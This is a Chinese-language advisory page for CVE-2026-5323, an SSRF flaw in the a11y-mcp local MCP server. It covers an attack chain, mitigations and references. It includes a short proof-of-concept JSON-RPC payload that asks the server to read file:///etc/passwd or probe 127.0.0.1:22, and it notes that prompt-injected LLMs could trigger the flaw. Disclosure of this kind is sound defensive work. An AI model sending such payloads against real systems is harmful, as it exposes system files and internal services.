CVE-2026-5323 CVSS 5.3 中危

CVE-2026-5323 priyankark a11y-mcp 服务端请求伪造漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5323

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

priyankark a11y-mcp

漏洞概述

priyankark a11y-mcp 版本 1.0.5 及之前版本存在安全漏洞。该漏洞位于 src/index.js 文件的 A11yServer 函数中，由于对输入验证不严，导致攻击者可从本地位置发起服务器端请求伪造 (SSRF) 攻击。尽管该产品为本地 stdio MCP 服务器且默认无网络访问接口，但恶意用户或被操纵的 LLM 可能利用此漏洞进行未授权的内部请求。建议用户尽快升级至 1.0.6 版本以修复此问题。

技术细节

该漏洞源于 priyankark a11y-mcp 项目中 `src/index.js` 文件内的 `A11yServer` 组件未能正确过滤用户提供的输入参数。由于该组件在处理请求时未对目标 URI 或资源标识符进行严格的校验和限制，攻击者可以通过构造恶意的本地请求，诱导服务器端向受控的内部资源发起请求。虽然该服务主要作为本地 stdio MCP 服务器运行，不具备直接的网络 HTTP 端点，但在受信任的本地环境或 LLM 调用上下文中，若攻击者获得了本地执行权限或通过模型注入，即可利用此 SSRF 漏洞探测内网服务或读取敏感元数据。官方已在版本 1.0.6 中通过提交 e3e11c9e8482bd06b82fd9fced67be4856f0dffc 修复了该过滤缺陷。

攻击链分析

STEP 1

步骤1：本地访问

攻击者需要在本地机器上拥有访问权限，或控制与 MCP 服务器交互的 LLM 上下文。

STEP 2

步骤2：构造恶意请求

攻击者构造包含恶意内部 URL（如 file:/// 或 http://127.0.0.1）的 JSON-RPC 请求，目标为 src/index.js 中的 A11yServer 函数。

STEP 3

步骤3：触发SSRF

a11y-mcp 服务器接收请求后，由于缺乏输入验证，直接利用服务器端的权限去请求攻击者指定的本地资源。

STEP 4

步骤4：信息泄露

服务器将请求到的敏感文件内容或内部服务响应返回给攻击者，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Conceptual PoC for CVE-2026-5323
// Target: priyankark a11y-mcp (<= 1.0.5)
// This demonstrates how a malicious payload could be sent to the vulnerable A11yServer function.

const maliciousPayload = {
  "jsonrpc": "2.0",
  "id": 1,
  "method": "tools/call", // Hypothetical method based on MCP structure
  "params": {
    "name": "check_accessibility",
    "arguments": {
      "url": "file:///etc/passwd" // Attempting to read local files via SSRF
      // Alternative: "url": "http://127.0.0.1:22" to scan local ports
    }
  }
};

// The attacker sends this JSON object to the stdio input of the a11y-mcp process.
// If vulnerable, the server will process the URL and return the content of /etc/passwd.

影响范围

priyankark a11y-mcp <= 1.0.5

防御指南

临时缓解措施

在升级前，限制运行 a11y-mcp 进程的用户权限，避免使用高权限账户。严格审查发送给 LLM 的输入以防止通过提示词注入触发该漏洞。监控本地进程的异常文件读写行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5323
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5323
3 Details https://www.cvedetails.com/cve/CVE-2026-5323/
4 VulDB https://vuldb.com/cve/CVE-2026-5323
5 Link https://github.com/priyankark/a11y-mcp/
6 Link https://github.com/priyankark/a11y-mcp/commit/e3e11c9e8482bd06b82fd9fced67be4856f0dffc
7 Link https://github.com/wing3e/public_exp/issues/17
8 Link https://vuldb.com/submit/780752
9 Link https://vuldb.com/vuln/354655
10 Link https://vuldb.com/vuln/354655/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表